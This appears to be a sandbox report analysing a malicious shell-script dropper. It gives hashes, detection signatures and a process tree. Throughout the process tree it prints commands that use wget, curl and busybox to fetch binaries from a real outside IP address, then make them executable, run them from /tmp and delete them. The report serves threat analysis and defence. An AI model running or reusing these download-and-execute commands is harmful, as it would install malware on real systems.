Analysis
-
max time kernel
61s -
max time network
63s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240418-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
18/10/2024, 01:44
Static task
static1
Behavioral task
behavioral1
Sample
5526f5a7976ca245ef2154c91f769b8cc02aeac8665e74992d2faee34374dad9.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
5526f5a7976ca245ef2154c91f769b8cc02aeac8665e74992d2faee34374dad9.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
5526f5a7976ca245ef2154c91f769b8cc02aeac8665e74992d2faee34374dad9.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
5526f5a7976ca245ef2154c91f769b8cc02aeac8665e74992d2faee34374dad9.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
5526f5a7976ca245ef2154c91f769b8cc02aeac8665e74992d2faee34374dad9.sh
-
Size
10KB
-
MD5
bfe3d249b6508a12db9768a04b73f517
-
SHA1
db227d5165875c1ff5204cbff31fd0cd47cad3cd
-
SHA256
5526f5a7976ca245ef2154c91f769b8cc02aeac8665e74992d2faee34374dad9
-
SHA512
f09d55be45117aa3959abf5049eff0283edea080c158c33f2efc02d03ac47e2bcf17eaa333a514e8617670308d41f4faf4d4795f49e32d98d4bcdaab874d08a2
-
SSDEEP
96:bNlrDkvnIeGl6WbjfLzSvTcI4xwMLLeO6qFlrDki2IeGl6WrkLkV9ZFLzSvTwP5v:bNlrDkvnyFLeOx7rDkAP9
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 891 chmod 927 chmod 957 chmod 981 chmod 765 chmod 933 chmod 885 chmod 987 chmod 993 chmod 758 chmod 771 chmod 797 chmod 951 chmod 963 chmod 840 chmod 903 chmod 921 chmod 945 chmod 999 chmod 823 chmod 909 chmod 915 chmod 975 chmod 939 chmod 834 chmod 858 chmod 897 chmod 969 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP 759 P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP /tmp/QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ 766 QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ /tmp/2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy 772 2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy /tmp/QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ 798 QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ /tmp/uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F 824 uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F /tmp/Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J 835 Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J /tmp/GtTyy46k97PMs25DsIOKewPL4B9poyk8id 841 GtTyy46k97PMs25DsIOKewPL4B9poyk8id /tmp/gNDLcu6twOiHBhJU7mmXM6OZssNtSFOIH7 860 gNDLcu6twOiHBhJU7mmXM6OZssNtSFOIH7 /tmp/DdHBtJMNYjRrgcNgqyj0Qzuwbob6GLAzln 886 DdHBtJMNYjRrgcNgqyj0Qzuwbob6GLAzln /tmp/O3QMGrtludoGhCVpOk7RvuMp28gsKtzS0N 892 O3QMGrtludoGhCVpOk7RvuMp28gsKtzS0N /tmp/QKupOA0pVV0dBSmVcznYjxHmdE5tt4gZiC 898 QKupOA0pVV0dBSmVcznYjxHmdE5tt4gZiC /tmp/a6pFSFjTV0vJBMsePn6ItEOyn0lcIh2e3N 904 a6pFSFjTV0vJBMsePn6ItEOyn0lcIh2e3N /tmp/zd9CIENUdnvUomXolPpH0gOdJL77iH3PvX 910 zd9CIENUdnvUomXolPpH0gOdJL77iH3PvX /tmp/LgAgf8NoanLiVkquiNwJ0eVwi7tgq6Yojq 916 LgAgf8NoanLiVkquiNwJ0eVwi7tgq6Yojq /tmp/P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP 922 P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP /tmp/QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ 928 QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ /tmp/2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy 934 2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy /tmp/QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ 940 QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ /tmp/uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F 946 uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F /tmp/Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J 952 Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J /tmp/GtTyy46k97PMs25DsIOKewPL4B9poyk8id 958 GtTyy46k97PMs25DsIOKewPL4B9poyk8id /tmp/gNDLcu6twOiHBhJU7mmXM6OZssNtSFOIH7 964 gNDLcu6twOiHBhJU7mmXM6OZssNtSFOIH7 /tmp/DdHBtJMNYjRrgcNgqyj0Qzuwbob6GLAzln 970 DdHBtJMNYjRrgcNgqyj0Qzuwbob6GLAzln /tmp/O3QMGrtludoGhCVpOk7RvuMp28gsKtzS0N 976 O3QMGrtludoGhCVpOk7RvuMp28gsKtzS0N /tmp/QKupOA0pVV0dBSmVcznYjxHmdE5tt4gZiC 982 QKupOA0pVV0dBSmVcznYjxHmdE5tt4gZiC /tmp/a6pFSFjTV0vJBMsePn6ItEOyn0lcIh2e3N 988 a6pFSFjTV0vJBMsePn6ItEOyn0lcIh2e3N /tmp/zd9CIENUdnvUomXolPpH0gOdJL77iH3PvX 994 zd9CIENUdnvUomXolPpH0gOdJL77iH3PvX /tmp/LgAgf8NoanLiVkquiNwJ0eVwi7tgq6Yojq 1000 LgAgf8NoanLiVkquiNwJ0eVwi7tgq6Yojq -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP curl File opened for modification /tmp/GtTyy46k97PMs25DsIOKewPL4B9poyk8id curl File opened for modification /tmp/P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP curl File opened for modification /tmp/Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J curl File opened for modification /tmp/O3QMGrtludoGhCVpOk7RvuMp28gsKtzS0N curl File opened for modification /tmp/QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ curl File opened for modification /tmp/gNDLcu6twOiHBhJU7mmXM6OZssNtSFOIH7 curl File opened for modification /tmp/zd9CIENUdnvUomXolPpH0gOdJL77iH3PvX curl File opened for modification /tmp/LgAgf8NoanLiVkquiNwJ0eVwi7tgq6Yojq curl File opened for modification /tmp/QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ curl File opened for modification /tmp/uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F curl File opened for modification /tmp/2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy curl File opened for modification /tmp/DdHBtJMNYjRrgcNgqyj0Qzuwbob6GLAzln curl File opened for modification /tmp/QKupOA0pVV0dBSmVcznYjxHmdE5tt4gZiC curl File opened for modification /tmp/a6pFSFjTV0vJBMsePn6ItEOyn0lcIh2e3N curl File opened for modification /tmp/LgAgf8NoanLiVkquiNwJ0eVwi7tgq6Yojq curl File opened for modification /tmp/2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy curl File opened for modification /tmp/gNDLcu6twOiHBhJU7mmXM6OZssNtSFOIH7 curl File opened for modification /tmp/a6pFSFjTV0vJBMsePn6ItEOyn0lcIh2e3N curl File opened for modification /tmp/Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J curl File opened for modification /tmp/GtTyy46k97PMs25DsIOKewPL4B9poyk8id curl File opened for modification /tmp/QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ curl File opened for modification /tmp/uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F curl File opened for modification /tmp/O3QMGrtludoGhCVpOk7RvuMp28gsKtzS0N curl File opened for modification /tmp/QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ curl File opened for modification /tmp/DdHBtJMNYjRrgcNgqyj0Qzuwbob6GLAzln curl File opened for modification /tmp/QKupOA0pVV0dBSmVcznYjxHmdE5tt4gZiC curl File opened for modification /tmp/zd9CIENUdnvUomXolPpH0gOdJL77iH3PvX curl
Processes
-
/tmp/5526f5a7976ca245ef2154c91f769b8cc02aeac8665e74992d2faee34374dad9.sh/tmp/5526f5a7976ca245ef2154c91f769b8cc02aeac8665e74992d2faee34374dad9.sh1⤵PID:728
-
/bin/rm/bin/rm bins.sh2⤵PID:732
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP2⤵PID:734
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:745
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP2⤵PID:755
-
-
/bin/chmodchmod 777 P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP2⤵
- File and Directory Permissions Modification
PID:758
-
-
/tmp/P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP./P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP2⤵
- Executes dropped EXE
PID:759
-
-
/bin/rmrm P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP2⤵PID:760
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ2⤵PID:761
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:763
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ2⤵PID:764
-
-
/bin/chmodchmod 777 QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ2⤵
- File and Directory Permissions Modification
PID:765
-
-
/tmp/QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ./QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ2⤵
- Executes dropped EXE
PID:766
-
-
/bin/rmrm QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ2⤵PID:767
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy2⤵PID:768
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:769
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy2⤵PID:770
-
-
/bin/chmodchmod 777 2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy2⤵
- File and Directory Permissions Modification
PID:771
-
-
/tmp/2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy./2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy2⤵
- Executes dropped EXE
PID:772
-
-
/bin/rmrm 2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy2⤵PID:773
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ2⤵PID:774
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:777
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ2⤵PID:793
-
-
/bin/chmodchmod 777 QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ2⤵
- File and Directory Permissions Modification
PID:797
-
-
/tmp/QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ./QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ2⤵
- Executes dropped EXE
PID:798
-
-
/bin/rmrm QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ2⤵PID:801
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F2⤵PID:802
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:808
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F2⤵PID:820
-
-
/bin/chmodchmod 777 uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F2⤵
- File and Directory Permissions Modification
PID:823
-
-
/tmp/uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F./uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F2⤵
- Executes dropped EXE
PID:824
-
-
/bin/rmrm uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F2⤵PID:828
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J2⤵PID:829
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:832
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J2⤵PID:833
-
-
/bin/chmodchmod 777 Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J2⤵
- File and Directory Permissions Modification
PID:834
-
-
/tmp/Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J./Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J2⤵
- Executes dropped EXE
PID:835
-
-
/bin/rmrm Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J2⤵PID:836
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/GtTyy46k97PMs25DsIOKewPL4B9poyk8id2⤵PID:837
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/GtTyy46k97PMs25DsIOKewPL4B9poyk8id2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:838
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/GtTyy46k97PMs25DsIOKewPL4B9poyk8id2⤵PID:839
-
-
/bin/chmodchmod 777 GtTyy46k97PMs25DsIOKewPL4B9poyk8id2⤵
- File and Directory Permissions Modification
PID:840
-
-
/tmp/GtTyy46k97PMs25DsIOKewPL4B9poyk8id./GtTyy46k97PMs25DsIOKewPL4B9poyk8id2⤵
- Executes dropped EXE
PID:841
-
-
/bin/rmrm GtTyy46k97PMs25DsIOKewPL4B9poyk8id2⤵PID:842
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/gNDLcu6twOiHBhJU7mmXM6OZssNtSFOIH72⤵PID:843
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/gNDLcu6twOiHBhJU7mmXM6OZssNtSFOIH72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:846
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/gNDLcu6twOiHBhJU7mmXM6OZssNtSFOIH72⤵PID:855
-
-
/bin/chmodchmod 777 gNDLcu6twOiHBhJU7mmXM6OZssNtSFOIH72⤵
- File and Directory Permissions Modification
PID:858
-
-
/tmp/gNDLcu6twOiHBhJU7mmXM6OZssNtSFOIH7./gNDLcu6twOiHBhJU7mmXM6OZssNtSFOIH72⤵
- Executes dropped EXE
PID:860
-
-
/bin/rmrm gNDLcu6twOiHBhJU7mmXM6OZssNtSFOIH72⤵PID:861
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/DdHBtJMNYjRrgcNgqyj0Qzuwbob6GLAzln2⤵PID:863
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/DdHBtJMNYjRrgcNgqyj0Qzuwbob6GLAzln2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:880
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/DdHBtJMNYjRrgcNgqyj0Qzuwbob6GLAzln2⤵PID:881
-
-
/bin/chmodchmod 777 DdHBtJMNYjRrgcNgqyj0Qzuwbob6GLAzln2⤵
- File and Directory Permissions Modification
PID:885
-
-
/tmp/DdHBtJMNYjRrgcNgqyj0Qzuwbob6GLAzln./DdHBtJMNYjRrgcNgqyj0Qzuwbob6GLAzln2⤵
- Executes dropped EXE
PID:886
-
-
/bin/rmrm DdHBtJMNYjRrgcNgqyj0Qzuwbob6GLAzln2⤵PID:887
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/O3QMGrtludoGhCVpOk7RvuMp28gsKtzS0N2⤵PID:888
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/O3QMGrtludoGhCVpOk7RvuMp28gsKtzS0N2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:889
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/O3QMGrtludoGhCVpOk7RvuMp28gsKtzS0N2⤵PID:890
-
-
/bin/chmodchmod 777 O3QMGrtludoGhCVpOk7RvuMp28gsKtzS0N2⤵
- File and Directory Permissions Modification
PID:891
-
-
/tmp/O3QMGrtludoGhCVpOk7RvuMp28gsKtzS0N./O3QMGrtludoGhCVpOk7RvuMp28gsKtzS0N2⤵
- Executes dropped EXE
PID:892
-
-
/bin/rmrm O3QMGrtludoGhCVpOk7RvuMp28gsKtzS0N2⤵PID:893
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/QKupOA0pVV0dBSmVcznYjxHmdE5tt4gZiC2⤵PID:894
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/QKupOA0pVV0dBSmVcznYjxHmdE5tt4gZiC2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:895
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/QKupOA0pVV0dBSmVcznYjxHmdE5tt4gZiC2⤵PID:896
-
-
/bin/chmodchmod 777 QKupOA0pVV0dBSmVcznYjxHmdE5tt4gZiC2⤵
- File and Directory Permissions Modification
PID:897
-
-
/tmp/QKupOA0pVV0dBSmVcznYjxHmdE5tt4gZiC./QKupOA0pVV0dBSmVcznYjxHmdE5tt4gZiC2⤵
- Executes dropped EXE
PID:898
-
-
/bin/rmrm QKupOA0pVV0dBSmVcznYjxHmdE5tt4gZiC2⤵PID:899
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/a6pFSFjTV0vJBMsePn6ItEOyn0lcIh2e3N2⤵PID:900
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/a6pFSFjTV0vJBMsePn6ItEOyn0lcIh2e3N2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:901
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/a6pFSFjTV0vJBMsePn6ItEOyn0lcIh2e3N2⤵PID:902
-
-
/bin/chmodchmod 777 a6pFSFjTV0vJBMsePn6ItEOyn0lcIh2e3N2⤵
- File and Directory Permissions Modification
PID:903
-
-
/tmp/a6pFSFjTV0vJBMsePn6ItEOyn0lcIh2e3N./a6pFSFjTV0vJBMsePn6ItEOyn0lcIh2e3N2⤵
- Executes dropped EXE
PID:904
-
-
/bin/rmrm a6pFSFjTV0vJBMsePn6ItEOyn0lcIh2e3N2⤵PID:905
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/zd9CIENUdnvUomXolPpH0gOdJL77iH3PvX2⤵PID:906
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/zd9CIENUdnvUomXolPpH0gOdJL77iH3PvX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:907
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/zd9CIENUdnvUomXolPpH0gOdJL77iH3PvX2⤵PID:908
-
-
/bin/chmodchmod 777 zd9CIENUdnvUomXolPpH0gOdJL77iH3PvX2⤵
- File and Directory Permissions Modification
PID:909
-
-
/tmp/zd9CIENUdnvUomXolPpH0gOdJL77iH3PvX./zd9CIENUdnvUomXolPpH0gOdJL77iH3PvX2⤵
- Executes dropped EXE
PID:910
-
-
/bin/rmrm zd9CIENUdnvUomXolPpH0gOdJL77iH3PvX2⤵PID:911
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/LgAgf8NoanLiVkquiNwJ0eVwi7tgq6Yojq2⤵PID:912
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/LgAgf8NoanLiVkquiNwJ0eVwi7tgq6Yojq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:913
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/LgAgf8NoanLiVkquiNwJ0eVwi7tgq6Yojq2⤵PID:914
-
-
/bin/chmodchmod 777 LgAgf8NoanLiVkquiNwJ0eVwi7tgq6Yojq2⤵
- File and Directory Permissions Modification
PID:915
-
-
/tmp/LgAgf8NoanLiVkquiNwJ0eVwi7tgq6Yojq./LgAgf8NoanLiVkquiNwJ0eVwi7tgq6Yojq2⤵
- Executes dropped EXE
PID:916
-
-
/bin/rmrm LgAgf8NoanLiVkquiNwJ0eVwi7tgq6Yojq2⤵PID:917
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP2⤵PID:918
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:919
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP2⤵PID:920
-
-
/bin/chmodchmod 777 P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP2⤵
- File and Directory Permissions Modification
PID:921
-
-
/tmp/P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP./P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP2⤵
- Executes dropped EXE
PID:922
-
-
/bin/rmrm P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP2⤵PID:923
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ2⤵PID:924
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:925
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ2⤵PID:926
-
-
/bin/chmodchmod 777 QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ2⤵
- File and Directory Permissions Modification
PID:927
-
-
/tmp/QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ./QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ2⤵
- Executes dropped EXE
PID:928
-
-
/bin/rmrm QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ2⤵PID:929
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy2⤵PID:930
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:931
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy2⤵PID:932
-
-
/bin/chmodchmod 777 2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy2⤵
- File and Directory Permissions Modification
PID:933
-
-
/tmp/2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy./2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy2⤵
- Executes dropped EXE
PID:934
-
-
/bin/rmrm 2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy2⤵PID:935
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ2⤵PID:936
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:937
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ2⤵PID:938
-
-
/bin/chmodchmod 777 QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ2⤵
- File and Directory Permissions Modification
PID:939
-
-
/tmp/QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ./QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ2⤵
- Executes dropped EXE
PID:940
-
-
/bin/rmrm QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ2⤵PID:941
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F2⤵PID:942
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:943
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F2⤵PID:944
-
-
/bin/chmodchmod 777 uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F2⤵
- File and Directory Permissions Modification
PID:945
-
-
/tmp/uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F./uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F2⤵
- Executes dropped EXE
PID:946
-
-
/bin/rmrm uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F2⤵PID:947
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J2⤵PID:948
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:949
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J2⤵PID:950
-
-
/bin/chmodchmod 777 Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J2⤵
- File and Directory Permissions Modification
PID:951
-
-
/tmp/Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J./Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J2⤵
- Executes dropped EXE
PID:952
-
-
/bin/rmrm Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J2⤵PID:953
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/GtTyy46k97PMs25DsIOKewPL4B9poyk8id2⤵PID:954
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/GtTyy46k97PMs25DsIOKewPL4B9poyk8id2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:955
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/GtTyy46k97PMs25DsIOKewPL4B9poyk8id2⤵PID:956
-
-
/bin/chmodchmod 777 GtTyy46k97PMs25DsIOKewPL4B9poyk8id2⤵
- File and Directory Permissions Modification
PID:957
-
-
/tmp/GtTyy46k97PMs25DsIOKewPL4B9poyk8id./GtTyy46k97PMs25DsIOKewPL4B9poyk8id2⤵
- Executes dropped EXE
PID:958
-
-
/bin/rmrm GtTyy46k97PMs25DsIOKewPL4B9poyk8id2⤵PID:959
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/gNDLcu6twOiHBhJU7mmXM6OZssNtSFOIH72⤵PID:960
-
-
